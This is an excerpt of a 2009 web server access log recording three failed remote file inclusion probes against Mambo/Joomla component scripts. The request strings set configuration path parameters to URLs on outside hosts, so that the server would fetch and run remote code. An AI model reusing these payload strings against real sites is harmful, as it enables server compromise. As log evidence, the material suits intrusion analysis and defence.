94.75.245.36 - - [28/Jul/2009:05:47:26 -0400] "GET /logs/access_log.Q109052200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 277 "-" "libwww-perl/5.823"
200.103.16.12 - - [28/Jul/2009:05:47:27 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:48:52 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
